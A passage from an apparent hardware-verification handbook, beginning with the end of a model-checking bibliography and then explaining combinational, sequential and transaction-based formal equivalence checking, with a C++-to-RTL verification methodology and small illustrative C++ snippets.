ICCAD 2001, San Jose, 4–8 Nov 2001. IEEE Computer Society, pp 176–182
Baumgartner J, Mony H (2009) Scalable liveness checking via property-preserving transforma-
tions. In: Benini L, Micheli GD, Al-Hashimi BM, Müller W (eds) Design, automation and test
in Europe, DATE 2009, Nice, 20–24 Apr 2009. IEEE, pp 1680–1685
Baumgartner J, Mony H, Paruthi V, Kanzelman R, Janssen G (2006) Scalable sequential
equivalence checking across arbitrary design transformations. In: 24th international conference
on computer design (ICCD 2006), 1–4 Oct 2006, San Jose. IEEE, pp 259–266
Bayless S, Val CG, Ball T, Hoos HH, Hu AJ (2013) Efficient modular SAT solving for IC3. In:
Formal methods in computer-aided design (FMCAD). IEEE, pp 149–156
Biere A, Cimatti A, Clarke EM, Zhu Y (1999) Symbolic model checking without BDDs. In:
Tools and algorithms for the construction and analysis of systems (TACAS). LNCS, vol 1579.
Springer, pp 193–207
Bjesse P, Borälv A (2004) Dag-aware circuit compression for formal verification. In: 2004
international conference on computer-aided design, ICCAD 2004, San Jose, 7–11 Nov 2004.
IEEE Computer Society/ACM, pp 42–49
Bjesse P, Kukula JH (2005) Automatic generalized phase abstraction for formal verification. In:
2005 international conference on computer-aided design, ICCAD 2005, San Jose, 6–10 Nov
2005. IEEE Computer Society, pp 1076–1082
Bradley AR (2011) SAT-based model checking without unrolling. In: Verification, model checking
and abstract interpretation (VMCAI). LNCS, vol 6538. Springer, pp 70–87
Bradley AR, Somenzi F, Hassan Z, Zhang Y (2011) An incremental approach to model checking
progress properties. In: Bjesse P, Slobodová A (eds) International conference on formal
methods in computer-aided design, FMCAD’11, Austin, 30 Oct–02 Nov 2011. FMCAD Inc.,
pp 144–153
Brayton RK, Mishchenko A (2010) ABC: an academic industrial-strength verification tool. In:
Computer aided verification (CAV). LNCS, vol 6174. Springer, pp 24–40
Bryant RE (1986) Graph-based algorithms for Boolean function manipulation. IEEE Trans
Comput 35(8):677–691
Burch JR, Clarke EM, McMillan KL, Dill DL, Hwang LJ (1990) Symbolic model checking: 10^20
states and beyond. In: Logic in computer science (LICS). IEEE, pp 428–439
Cabodi G, Nocco S, Quer S (2011) Interpolation sequences revisited. In: Design automation and
test in Europe (DATE). IEEE, pp 316–322
Cabodi G, Camurati P, Mishchenko A, Palena M, Pasini P (2017) SAT solver management
strategies in IC3: an experimental approach. Formal Methods Syst Des 50(1):39–74
Chockler H, Ivrii A, Matsliah A, Moran S, Nevo Z (2011) Incremental formal verification of
hardware. In: Formal methods in computer-aided design (FMCAD). FMCAD Inc., pp 135–143
Claessen K, Sörensson N (2012) A liveness checking algorithm that counts. In: Cabodi G, Singh S
(eds) Formal methods in computer-aided design, FMCAD 2012, Cambridge, 22–25 Oct 2012.
IEEE, pp 52–59
Clarke EM, Emerson EA, Sistla AP (1986) Automatic verification of finite-state concurrent
systems using temporal logic specifications. ACM Trans Program Lang Syst 8(2):244–263
Clarke E, Grumberg O, Long D (1992) Model checking and abstraction. In: Principles of
programming languages (POPL). ACM, pp 343–354
Clarke EM, Grumberg O, Jha S, Lu Y, Veith H (2000) Counterexample-guided abstraction
refinement. In: Computer aided verification (CAV). LNCS, vol 1855. Springer, pp 154–169
Clarke EM, Grumberg O, Peled DA (2001) Model checking, 1st edn. MIT Press
Clarke EM, Grumberg O, Jha S, Lu Y, Veith H (2003) Counterexample-guided abstraction
refinement for symbolic model checking. J ACM 50(5):752–794
Clarke EM, Kroening D, Ouaknine J, Strichman O (2004) Completeness and complexity
of bounded model checking. In: Verification, model checking and abstract interpretation
(VMCAI). LNCS, vol 2937. Springer, pp 85–96
Cook SA (1971) The complexity of theorem-proving procedures. In: ACM symposium on theory
of computing (STOC). ACM, pp 151–158
Craig W (1957) Linear reasoning. A new form of the Herbrand-Gentzen theorem. J Symb Logic
22(3):250–268
Eén N, Mishchenko A (2013) A fast reparameterization procedure. In: Ganai MK, Sen A (eds)
Proceedings of the second international workshop on design and implementation of formal tools
and systems, Portland, 19 Oct 2013. CEUR workshop proceedings, vol 1130. CEUR-WS.org
Eén N, Mishchenko A, Amla N (2010) A single-instance incremental SAT formulation of proof-
and counterexample-based abstraction. In: Bloem R, Sharygina N (eds) Proceedings of 10th
international conference on formal methods in computer-aided design, FMCAD 2010, Lugano,
20–23 Oct. IEEE, pp 181–188
Eén N, Mishchenko A, Brayton R (2011) Efficient implementation of property directed
reachability. In: Formal methods in computer-aided design (FMCAD). FMCAD Inc,
pp 125–134
Froleyks N, Biere A (2021) Single clause assumption without activation literals to speed-up IC3.
In: Formal methods in computer aided design, FMCAD 2021, New Haven, 19–22 Oct 2021.
IEEE, pp 72–76
Goldberg E, Novikov Y (2003) Verification of proofs of unsatisfiability for CNF formulas. In:
Design automation and test in Europe (DATE). IEEE, pp 886–891
Gurfinkel A, Ivrii A (2015) Pushing to the top. In: Kaivola R, Wahl T (eds) Formal methods in
computer-aided design, FMCAD 2015, Austin, 27–30 Sept 2015. IEEE, pp 65–72
Hassan Z, Bradley AR, Somenzi F (2013) Better generalization in IC3. In: Formal methods in
computer-aided design (FMCAD). FMCAD Inc., pp 157–164
Hurst AP, Mishchenko A, Brayton RK (2007) Fast minimum-register retiming via binary
maximum-flow. In: Formal methods in computer-aided design, 7th international conference,
FMCAD 2007, Austin, 11–14 Nov 2007, Proceedings. IEEE Computer Society, pp 181–187
Ivrii A, Nevo Z, Baumgartner J (2018) k-FAIR = k-LIVENESS + FAIR: revisiting SAT-based liveness
algorithms. In: Bjørner N, Gurfinkel A (eds) 2018 formal methods in computer aided design,
FMCAD 2018, Austin, 30 Oct–2 Nov 2018. IEEE, pp 1–5
Jhala R, McMillan KL (2005) Interpolant-based transition relation approximation. In: Computer
aided verification (CAV), vol 3576. Springer, pp 39–51
Krishnan HGV, Vizel Y, Ganesh V, Gurfinkel A (2019) Interpolating strong induction. In: Dillig
I, Tasiran S (eds) Computer aided verification – 31st international conference, CAV 2019, New
York City, 15–18 July 2019, Proceedings, Part II. Lecture notes in computer science, vol 11562.
Springer, pp 367–385
Kuehlmann A, Baumgartner J (2001) Transformation-based verification using generalized
retiming. In: Berry G, Comon H, Finkel A (eds) Computer aided verification, 13th international
conference, CAV 2001, Paris, 18–22 July 2001, Proceedings. Lecture notes in computer science,
vol 2102. Springer, pp 104–117
Kuehlmann A, Paruthi V, Krohm F, Ganai MK (2002) Robust Boolean reasoning for equivalence
checking and functional property verification. IEEE Trans Comput Aided Des Integr Circuits
Syst 21(12):1377–1394
Kurshan RP (1994) Computer-aided verification of coordinating processes: the automata-theoretic
approach. Princeton University Press, Princeton
Li J, Zhu S, Zhang Y, Pu G, Vardi MY (2017) Safety model checking with complementary
approximations. In: Parameswaran S (ed) 2017 IEEE/ACM international conference on
computer-aided design, ICCAD 2017, Irvine, 13–16 Nov 2017. IEEE, pp 95–100
McMillan KL (2003) Interpolation and SAT-based model checking. In: Computer aided
verification (CAV). LNCS, vol 2725. Springer, pp 1–13
McMillan KL, Amla N (2003) Automatic abstraction without counterexamples. In: Tools and
algorithms for the construction and analysis of systems (TACAS). LNCS, vol 2619. Springer,
pp 2–17
Mishchenko A, Chatterjee S, Brayton RK (2006) Dag-aware AIG rewriting a fresh look at
combinational logic synthesis. In: Sentovich E (ed) Proceedings of the 43rd design automation
conference, DAC 2006, San Francisco, 24–28 July 2006. ACM, pp 532–535
Mishchenko A, Eén N, Brayton RK, Baumgartner J, Mony H, Nalla PK (2013) GLA: gate-level
abstraction revisited. In: Design automation and test in Europe (DATE). EDA Consortium,
pp 1399–1404
Mony H, Baumgartner J, Paruthi V, Kanzelman R, Kuehlmann A (2004) Scalable automated
verification via expert-system guided transformations. In: Hu AJ, Martin AK (eds) Formal
methods in computer-aided design, 5th international conference, FMCAD 2004, Austin, 15–17
Nov 2004, Proceedings. Lecture notes in computer science, vol 3312. Springer, pp 159–173
Mony H, Baumgartner J, Mishchenko A, Brayton RK (2009) Speculative reduction-based scalable
redundancy identification. In: Benini L, Micheli GD, Al-Hashimi BM, Müller W (eds) Design,
automation and test in Europe, DATE 2009, Nice, 20–24 Apr 2009. IEEE, pp 1674–1679
Moon I, Kwak H, Kukula JH, Shiple TR, Pixley C (2002) Simplifying circuits for formal
verification using parametric representation. In: Aagaard MD, O’Leary JW (eds) Formal
methods in computer-aided design, 4th international conference, FMCAD 2002, Portland,
6–8 Nov 2002, Proceedings. Lecture notes in computer science, vol 2517. Springer, pp 52–69
Pnueli A (1977) The temporal logic of programs. In: 18th annual symposium on foundations of
computer science, Providence, 31 Oct–1 Nov 1977. IEEE Computer Society, pp 46–57
Queille J-P, Sifakis J (1982) Specification and verification of concurrent systems in CESAR. In:
International symposium on programming, pp 337–351
Ravi K, Bloem R, Somenzi F (2000) A comparative study of symbolic algorithms for the compu-
tation of fair cycles. In: Hunt WA Jr, Johnson SD (eds) Formal methods in computer-aided
design, third international conference, FMCAD 2000, Austin, 1–3 Nov 2000, Proceedings.
Lecture notes in computer science, vol 1954. Springer, pp 143–160
Rozier KY (2011) Linear temporal logic symbolic model checking. Comput Sci Rev 5(2):163–203
Schuppan V, Biere A (2004) Efficient reduction of finite state model checking to reachability
analysis. Int J Softw Tools Technol Transf 5(2–3):185–204
Sheeran M, Singh S, Stålmarck G (2000) Checking safety properties using induction and a SAT-
solver. In: Formal methods in computer-aided design (FMCAD). LNCS, vol 1954. Springer,
pp 108–125
Tseitin G (1983) On the complexity of proofs in propositional logics. In: Siekmann J, Wrightson
G (eds) Automation of reasoning: classical papers in computational logic 1967–1970, vol 2.
Springer. Originally published 1970
van Eijk CAJ (1998) Sequential equivalence checking without state space traversal. In: Dewilde
PM, Rammig FJ, Musgrave G (eds) 1998 design, automation and test in Europe (DATE’98),
23–26 Feb 1998, Le Palais des Congrès de Paris, Paris. IEEE Computer Society, pp 618–623
Vardi MY (2007) Automata-theoretic model checking revisited. In: Cook B, Podelski A (eds)
Verification, model checking, and abstract interpretation, 8th international conference, VMCAI
2007, Nice, 14–16 Jan 2007, Proceedings. Lecture notes in computer science, vol 4349.
Springer, pp 137–150
Vizel Y, Grumberg O (2009) Interpolation-sequence based model checking. In: Formal methods
in computer-aided design (FMCAD). IEEE, pp 1–8
Vizel Y, Gurfinkel A (2014) Interpolating property directed reachability. In: Computer aided
verification (CAV). LNCS, vol 8559. Springer, pp 260–276
Vizel Y, Ryvchin V, Nadel A (2013) Efficient generation of small interpolants in CNF. In:
Computer aided verification (CAV). LNCS, vol 8044. Springer, pp 330–346
Vizel Y, Gurfinkel A, Malik S (2015) Fast interpolating BMC. In: Kroening D, Pasareanu CS
(eds) Computer aided verification – 27th international conference, CAV 2015, San Francisco,
18–24 July 2015, Proceedings, Part I. Lecture notes in computer science, vol 9206. Springer,
pp 641–657
Wolper P, Vardi MY, Sistla AP (1983) Reasoning about infinite computation paths (extended
abstract). In: 24th annual symposium on foundations of computer science, Tucson, 7–9 Nov
1983. IEEE Computer Society, pp 185–194
Wu C, Wu C, Lai C, Huang CR (2013) A counterexample-guided interpolant generation algorithm
for SAT-based model checking. In: The 50th annual design automation conference 2013,
DAC’13, Austin, 29 May–07 June 2013. ACM, pp 118:1–118:6
High-Level Formal Equivalence
35
Theo Drane and M. V. Achutha Kiran Kumar
Contents
Types of Equivalence to Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1244
Combinational Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1245
Sequential Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1246
Transaction-Based Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1247
Advanced Datapath Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1259
Managing Inconclusive Proofs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1259
Accuracy Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1261
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1268
T. Drane ()
Intel Corporation, Folsom, CA, USA
e-mail: [email protected]
M. V. A. Kiran Kumar ()
DEG, Intel Corporation, Bengaluru, India
e-mail: [email protected]
The need for FEV can be seen as a natural outgrowth of the increased level of design
abstraction as the industry has matured over the past half century. During the initial
days of chip design (before 1980), the designers used to draw the circuits by hand
and work at the transistor level. In the following decade (1981–1989), the drawing
of such circuits was improved with the aid of computer-aided design (CAD), and
circuit design became much simpler, but was not yet optimal. In these early days,
nobody thought about verifying their designs formally; the technology had not yet
reached the level where such tools were possible for practical use.
The RTL mode of designing started around the early 1990s and is still the
major mode of logic design as of this writing. With the advent of RTL, new tools
were introduced to automatically synthesize the coded design into the functional
schematic netlists. This allowed the generation of much more complex netlists than
were possible with previous methods, which necessitated good RTL-vs-netlist FEV
tools. In the twenty-first century, the C/C++/SystemC mode of coding the design
has begun to emerge, where the design is defined in the high-level language, and a
new generation of synthesis tools can convert the high-level language to RTL and
even to the netlist. Hence formal equivalence checks have become an even more
important requirement to ensure that designs are faithfully translated across the
different abstraction levels. Due to these various motivations, FEV is one of the most
mature FV techniques; it is now considered a standard requirement to ensure the
design intent is maintained as designers refine their abstractions into real designs.
This chapter explores various equivalence techniques, looks at their applications
in the real world, and shows how they require a different style of interaction with
the tools and with the design. The primary context for the discussion is usages
where at least one of the models is RTL. These are also the usage modes for which
the most mature industry tools are available.
As design size and complexity grow, it is not unusual to encounter formal equiv-
alency proofs that yield inconclusive results. Approaches to overcoming such
challenges as well as cases of bounded equivalence are covered at the end of the
chapter.
Combinational Equivalence
Combinational equivalence is the most mature FEV technique in the EDA industry;
using this technique to compare RTL and schematic netlists is considered a
requirement at most companies doing VLSI design. This is the primary FEV
technique used for state-matching models, where every state element (latch or flop)
in the SPEC corresponds to a specific state element in the IMP. In this mode, two
designs are claimed to be equivalent when the combinational logic between any
pair of corresponding state elements is logically equivalent. In other words, there is a 1:1 correspondence
between the state elements of the two models. Whenever the equivalence of a pair
of state elements in the two models is checked, the tool uses the assumption that
corresponding state elements in their fanin cones will contain identical values at all
points in time. In effect, every latch or flop in the two designs is being treated as a
cut point, with verification only encompassing the logic between the state elements.
This might seem like a huge limitation – but it arose in tandem with logic
synthesis technology that has a similar structure. In other words, most EDA tools
that synthesize netlists from RTL are also state-matching, guaranteeing (mostly)
that each state element in the netlist will correspond to a state element in the RTL.
In addition, the state-matching compromise makes the FEV problem much more
tractable: FEV tools that use this method just need to analyze Boolean expressions,
with no need to account for value changes over time. Thus, combinational FEV is
the technique used in most RTL-to-gate equivalence checkers today. If state elements are
present, then not only are the outputs compared but the logic cones driving each pair
of corresponding registers are checked individually. Since the RTL and netlist state
elements directly correspond to each other, this check guarantees that the netlist is
truly an implementation of the RTL.
As depicted in Fig. 1, the key points, or significant points used by the FEV tool,
are composed of the input-output interfaces and the internal state elements. The
main points of comparison are the state elements {R1, r1} and {R2, r2} and the
outputs X and Y. As long as each of these points can be shown to have logically
equivalent combinational driving cones in both models, one can confidently say that
the models are equivalent.
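As a toy illustration of this cut-point reasoning (exhaustive enumeration stands in for the SAT/BDD engines a real tool would use, and the cones are invented):

#include <cstdint>
#include <functional>
#include <iostream>

// Toy illustration of combinational FEV on one matched cut: the matched
// state elements and primary inputs are treated as free cut points, and the
// two combinational cones must agree on every assignment. A real tool hands
// the miter coneSpec(x) XOR coneImpl(x) to a SAT solver or a BDD package.
bool conesEquivalent(unsigned numCutBits,
                     const std::function<bool(std::uint32_t)>& coneSpec,
                     const std::function<bool(std::uint32_t)>& coneImpl) {
    for (std::uint32_t x = 0; x < (1u << numCutBits); ++x)
        if (coneSpec(x) != coneImpl(x)) return false;  // miter fires
    return true;
}

int main() {
    // Example cones over 3 cut bits: (a & b) | c versus its De Morgan form.
    auto spec = [](std::uint32_t x) { return ((x & 1) && (x & 2)) || (x & 4); };
    auto impl = [](std::uint32_t x) { return !(!((x & 1) && (x & 2)) && !(x & 4)); };
    std::cout << (conesEquivalent(3, spec, impl) ? "equivalent" : "differ") << "\n";
}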
One can probably think of some major limitations of this type of equivalence.
For example, what happens if the implementation needs to recode a finite state
machine (FSM), using a different set of intermediate states to ultimately generate
the same output? The application of combinational equivalence to FSMs is limited
to comparing models that have equivalent sets of state elements. If this condition is
not met, the combinational FEV tool will report the two models as non-equivalent.
Modern RTL-netlist FEV tools do have some clever optimizations for very simple
cases of non-state-matching, such as flop replication or constant propagation. But
in general, the state-preserving requirement is a stringent one, and there are many
FEV scenarios in which it must be relaxed for effective verification.
Sequential Equivalence
• State representation
• Pipeline depth
• Interface timing and protocols
• Resource scheduling and allocation
• Differences in data types
• Clock gating and other power-saving features
For example, when using sequential FEV, one of the designs under comparison
might be a pipelined version of the other. One could prove the equivalence of the
pure behavioral model of the RTL to the complete pipelined implementation and be satisfied
that they do indeed implement equivalent functionality. One common application of
this methodology is during the equivalence check of an unpipelined and pipelined
model in RTL. In the simplest case of comparison, one can assume that the same
input patterns are applied to the corresponding inputs of both the designs, and the
outputs are compared with some known delay after the RTL pipeline is completely
filled.
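A minimal simulation-level sketch of this alignment (the SPEC function and the 3-stage pipelined IMP below are invented placeholders; a sequential FEV tool establishes the same relation symbolically for all input sequences):

#include <array>
#include <cassert>
#include <cstdint>
#include <utility>

// Invented example: unpipelined SPEC versus a 3-stage pipelined IMP of
// the same function, with outputs compared at a fixed latency once the
// pipeline is full.
constexpr unsigned DEPTH = 3;

std::uint32_t spec(std::uint32_t a, std::uint32_t b) { return a * b + 1; }

struct PipelinedImpl {
    std::array<std::uint32_t, DEPTH> stage{};               // pipeline registers
    std::uint32_t step(std::uint32_t a, std::uint32_t b) {  // one clock cycle
        std::uint32_t out = stage[2];
        stage[2] = stage[1] + 1;   // stage 2: add the constant
        stage[1] = stage[0];       // stage 1: pass-through
        stage[0] = a * b;          // stage 0: multiply
        return out;
    }
};

int main() {
    PipelinedImpl imp;
    std::array<std::pair<std::uint32_t, std::uint32_t>, 8> in{
        {{1, 2}, {3, 4}, {5, 6}, {7, 8}, {2, 2}, {9, 9}, {0, 5}, {6, 7}}};
    for (unsigned t = 0; t < in.size(); ++t) {
        std::uint32_t out = imp.step(in[t].first, in[t].second);
        if (t >= DEPTH)   // compare against the input DEPTH cycles earlier
            assert(out == spec(in[t - DEPTH].first, in[t - DEPTH].second));
    }
}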
Transaction-Based Equivalence
This is another variant of sequential FEV. In some cases, one model will be highly
abstract compared to the other, and its outputs will generally not match cycle-by-
cycle except for certain well-defined transactions. This needs a looser notion of
equivalence, based on checking that legal transactions are handled equivalently. The
equivalence can be after a fixed number of RTL clock cycles, which could signify
the transaction, or a completely unpredictable number based on the transaction
completion. Hence, this notion is more generic and is a superset of all the
equivalence modes: models which are not combinationally or sequentially equivalent
may still be able to demonstrate transaction-based equivalence.
Figure 2 illustrates a high-level view of a transaction-based equivalence check.
To further clarify what FEV is doing, let’s examine a conceptual view of the
“transaction space” of a typical design.
This notion of equivalence is quite general and encompasses the previous notions
of equivalence described in this section. This model of equivalence:
• Does not assume that the amount of time (or the number of state transitions)
required to complete one transaction will be the same for the RTL and the system
level design (SLM)
• Denotes the end of a transaction by either a fixed number of RTL cycles or some
kind of “data ready” handshaking protocol
• Assumes the user is able to specify a set of initial states (a partial assignment of
values to the state-holding elements) for both the RTL and system level design,
which represents the model state at the start of a valid transaction
• Assumes the user is able to specify a set of states for both designs that correspond
to the end of a transaction
At the end of a transaction, the outputs of the two designs are compared, and a check
is made to ensure the ending state of both designs still satisfies the state invariants
and constraints.
Most performance optimizations would make the design retain the same func-
tionality but wouldn’t necessarily have a constant or definite relationship with the
earlier implementation. In such cases, even a sequential equivalence check might not
be the correct option to choose; transaction-based equivalence is the right fit here.
Verification Methodology
1. SystemC/C++ front-end compilation
Specifications written in high level languages such as C/C++ and SystemC
are used to test the functionality of complex algorithms. These specifications
are exhaustively tested against standard WHQL and other standard algorithmic
references and are considered golden w.r.t architecture specifications. Ideally,
one would want to compare these golden specs directly with RTL to achieve
confidence in the RTL design once the complete data space coverage is available.
However, compiling a C++ specification in a formal tool can range from
straightforward to nearly impossible, for instance when it exposes data structures
on which the proof never converges; the difficulty depends on how the design
has been written and on the capability of the FV tool.
The high-level code, agnostic to the formal verification requirements, tends
to have many features that are not formal friendly. The coding standards
for this kind of simulation code aim at maximizing efficiency
and speed, which is not a good fit for FV compatibility. Also, every
company has a set of optimized and customized libraries which are essential in
writing the golden specs. It would be challenging if the constructs used in these
libraries are not supported by the formal verification tool. Some examples could be
extensive use of pointers, use of new and delete constructs (in the context of dynamic
memory allocation), extensive use of STLs, string functions (mostly used in test
generation code), etc.
In most of the cases, the problem may be due to inherent style and comfort
level of the designer writing the code and it may be entirely possible to
avoid such constructs by rewriting this in a formal-friendly way. However, the
legacy code involved may have many such deep rooted constructs which would
be impossible/impractical to rectify and rewrite. Handling these complexities
of simulation models, this boundary does not match as the designers are mostly
focused on unit level interface matching and do not care about the algorithmic
boundary. Hence most FV tools provide a standard way of writing a wrapper over
the C++ code. This glue logic would clearly convey to the tool the inputs and
outputs which need to be treated as symbolic. Also, it clearly identifies the C++
function which is to be tested using transactional equivalence.
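A minimal sketch of such glue logic (the wrapper name, the fma_ref stand-in, and the tied-off range are all invented for illustration; each tool has its own conventions for marking the top-level function and symbolic inputs):

#include <cstdint>

// Invented stand-in for a golden C++ spec function (illustration only).
std::uint32_t fma_ref(std::uint32_t a, std::uint32_t b, std::uint32_t c) {
    return a * b + c;
}

// Minimal sketch of a verification wrapper: it exposes exactly the inputs
// to be treated as symbolic and the output to be compared against the RTL,
// hiding test-generation and library internals from the formal tool.
std::uint32_t fev_top(std::uint32_t a, std::uint32_t b, std::uint32_t c) {
    a &= 0x00FFFFFF;  // illustrative tie-off: upper bits zero, as in the RTL
    return fma_ref(a, b, c);
}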
The specification in C will be converted to a suitable format for the tool to
process the design and start the verification activity. Some tools convert into a
form of a binary decision diagram (BDD) and some prefer to create a data flow
graph (DFG).
3. Linting checks on C++/SystemC
Many static checks can be run on the database that can be created from the
compilation. The static checks can range from pointer checks, loop limits,
typecasting checks, to range overflow checks. There are other linting checks
also possible in C++, such as standard static checks which flag conditions that
crash the program or lead to undefined behavior (out-of-bound array accesses,
maximum iteration violations, division by zero, a shift whose second operand
exceeds the bit width of the first operand, and so on). These are usually
checked automatically by all tools in the compilation phase itself.
4. RTL front-end compilation
There are many Verilog/SV/VHDL front-end parsers and compilers in the market
that also translate the implementation design into a BDD/DFG.
5. Linting checks in RTL
Multiple static RTL checks like multiple driver assignment, combo loop assess-
ment, and undriven checks are possible on the implementation RTL. There are
many static checks possible beyond the basic LINT checks, depending on the
strength of the front-end compiler deployed.
6. C++ – RTL mapping
Creating the verification problem needs a mapping of the two designs to be ver-
ified. The mapping can mean creating points of equivalent drives across various
interfaces on the design under consideration. Many tools support mapping by
name and hence can map the equivalent points across spec and implementation.
Depending on the methods of solving the problem either running some sample
dynamic simulations, semi-symbolic checks, or full-blown symbolic verification,
these mappings help in constraining the problem. There are various kinds of
mappings which may be required such as the following:
(a) Primary inputs: Either “map-by-name” or explicit mapping the signals
between the wrapper on C module and primary inputs of RTL.
(b) Primary outputs: Again, these could be “map-by-name” or explicit mapping
the primary outputs.
(c) Undrivens: Formulating the full problem for analysis needs driving all signals
and in some cases explicitly driving certain signals with X/Z/discrete
values.
(d) Cutpoints: At times, there are signals in RTL which are not present as input
in C++/SystemC code. They may be instantiated in C++ as global/static
(c) Latency
C++ is untimed. A wrapper written on top of it, if written in SystemC, often
is treated as a 1 cycle delay. However, RTL can have variable latency. That
latency needs to be provided in the equivalence either as a fixed value or in
terms of constraints dependent on some signal (such as output_dv, etc).
(d) Throughput
In a stable state, one should be able to determine the frequency of incoming
data such that design is able to output data at the same frequency. There may
be a situation where to avoid interaction bugs, the pipeline only accepts one
input every n number of cycles; this constraint needs to be provided to avoid
spurious counterexamples.
(e) Clock, reset, and env constraints
The clock signals, behavior of resets, behavior of non-resettable flops in
case of some designs, and other environment constraints which are part of
peripheral logic driving the datapath algorithm such as enable signals, hold
signals, dv, etc. need to be defined. To cite an example, in the case of an execution
unit, one needs to clearly state that only one operation can be done at a time.
(f) Constants, tie offs
There may be additional signals driving the RTL circuit which do not have
any impact on actual algorithmic implementation or which need to be driven
to a constant value. This is true in the case of C++ as well, where there may be if-
then-else conditions which need to be driven in a certain manner to drive the
correct logic. For example, let us suppose code in C++ has an if statement
to drive either a multiplication algorithm or an FMA algorithm in a single
function. To prove this function against an FMA RTL, one needs to tie off
the if condition in C++ to a fixed value driving FMA path. These tie offs are
also useful to constrain the environment in the case of huge designs with various
paths, with the aim of achieving convergence using case splitting, which will
be elaborated later.
(g) Transactors/BFMs/master mode abstractions/checker BFMs
These are specific transactors for the formal environment, modeling extra logic
to align the signal-level details between the HLM and the RTL implementation. It
is strongly advisable to capture such logic as BFMs/transactors. For example,
a signal pre-dv may be defined in RTL which arrives one cycle before the dv
signal and related data input in the implementation, while the specification
in C++ would define the dv signal at the interface. It is recommended to
write a transactor to model this instead of complicating the assumptions.
There would be even more complex relations across various signals and
hence transactors/abstraction models are preferred to model these relations.
Transactors can also be used on the output interfaces to model such complex
relations on the output side, similar to the input interface assumptions; these are
called checker abstractions/BFMs. A minimal input-side transactor for the pre-dv
example is sketched below.
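A behavioral sketch of the input-side transactor for this pre-dv example (the one-cycle relation is modeled with a single register; names follow the text):

// Behavioral sketch of an input-side transactor (illustration only): the
// RTL receives pre_dv one cycle before the dv that the C++ spec sees, so
// the transactor delays pre_dv by one register instead of encoding the
// relation as assumptions.
struct PreDvTransactor {
    bool pending = false;          // pre_dv observed on the previous cycle
    // Called once per clock; returns the dv to present on the spec side.
    bool step(bool pre_dv) {
        bool dv = pending;
        pending = pre_dv;
        return dv;
    }
};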
8. Blackboxing
There may be modules in both C++ and RTL which may be either non-formal-
friendly or not required for actual algorithm and would hamper convergence
efforts. Such modules or functions can be chosen to be blackboxed in most
formal verification equivalence tools using ignore functions or blackbox com-
mands. Blackboxing modules after proving them is also a neat method of
achieving convergence on a huge design, as will be explained later in this
chapter.
9. Assertions for proofs
The final check on equivalence is that given the mappings between inputs and
outputs and the correct set of constrained environments, the final outputs should
match between the spec and the imp at the appropriate latency mentioned. The
verification engineer can also write additional lemmas for sanity of the RTL
code such as to check the expected outcome on output control signals such as
output_dv, output_hold, and flags.
There may be bypass cases not covered in C++ which can simply be
checked in the verification tool with assertions, such as: if a certain bypass
condition in RTL is true, the output equals the input.
In addition, once the setup is ready, properties can be written only on the
C++ as well to ensure design intent. For example, if an architect expects
that output of an algorithm can never be negative or any intermediate signal
is always within a certain range, then properties can be written only on C++ to
validate the desired intent. In the case of fixed-precision numbers, properties can be
written to check the error range against floating-point numbers as well, as sketched below.
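A generic sketch of such intent checks written purely on the C++ side (my_algorithm and all of the ranges below are invented; real tools supply their own assertion mechanisms):

#include <cassert>
#include <cmath>
#include <cstdint>

// Invented stand-in for a fixed-point spec algorithm: value = x^2 / 256.
std::int32_t my_algorithm(std::int32_t x) { return (x * x) >> 8; }

void check_intent(std::int32_t x) {   // assume 0 <= x <= 4096
    std::int32_t y = my_algorithm(x);
    assert(y >= 0);                   // architect's claim: never negative
    assert(y <= (1 << 16));           // claimed output range
    // Fixed- versus floating-point error-range check against a reference.
    double ref = static_cast<double>(x) * x / 256.0;
    assert(std::fabs(static_cast<double>(y) - ref) < 1.0);
}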
10. Verification
(a) Dynamic quick checks (2 valued vs 3 valued)
All formal verification tools are equipped with a constrained random
simulator to quickly ascertain the sanity of both C++ and RTL design and
ensure that there are no simple bugs in the design. The simulator is run
even before the formal model is compiled. This gives formal tools an edge over
simulation tools in terms of speed and efficiency. The tools can run 2-valued
or 3-valued simulation while the formal proof is being done.
(b) Full proofs
FV tools are equipped with various engines. Brute-force solving resorts to
SAT/SMT solvers and BDD-based engines. For more complex algorithms,
most tools have specific engines to deal with different algorithmic variations
such as bit wise operations, multiplication, shift operations, etc. These
engines are equipped with various word level solvers to cater to specific
problems.
For example, a multiplier may be implemented in RTL with different
optimized algorithms such as Booth encoding, partial-product schemes,
higher-radix multiplication, or Wallace trees.
(Figure: staged verification of a pipelined multiplier, in which the stage 0
multiplication output is assumed correct, each subsequent stage is verified via
C++-RTL equivalence, and the final output is compared with the C++ output
only if none of the stages is bypassed.)
One problem associated with using cutpoints is that the signal is now
driven as being symbolic, so any necessary constraints associated with this
signal must now be stated separately to avoid spurious counterexamples.
For example, if, due to the driving logic, the signal always had its upper
3 bits as zero (the RTL/C++ designer chose extra bit widths to accommodate
future projects), then this constraint needs to be marked explicitly.
Finding such constraints is difficult, as designers are often not aware
of how internal signals should be constrained. One workaround is to add
the cutpoint only in either the SPEC or the IMP, whichever logic is more
involved; that way, the state space is reduced in the circuit where the
cutpoint is added, while the correct constraints are still obtained from the
circuit where no cutpoint was added.
Cutpoints are also useful to enable blackboxing functions which are
non-formal-friendly, such as log in C++: it is recommended to first prove
that the input to the log function matches some intermediate signal in RTL,
then add a cutpoint at the output of the log function and map it to the output
of the (standard) log lookup table in the RTL. This helps to bypass log and
still claim end-to-end convergence.
(e) Dynamic weakening
This technique helps to guide the tool regarding the signals which are not
expected to be in the cone of logic and can be ignored. This speeds up the
process of convergence.
(f) Assume guarantee
Assume-guarantee is a technique to prove intermediate points in the two
designs and assume them for further proofs. Adding all assertions as
assumptions can lead to a huge state space, preventing convergence even
for otherwise simple proofs. Hence, most tools provide advanced
assume-guarantee support for selecting which logic to prove through this
technique and which assertions are to be treated as assumptions.
Convergence: Once all failures are resolved, one may still face convergence
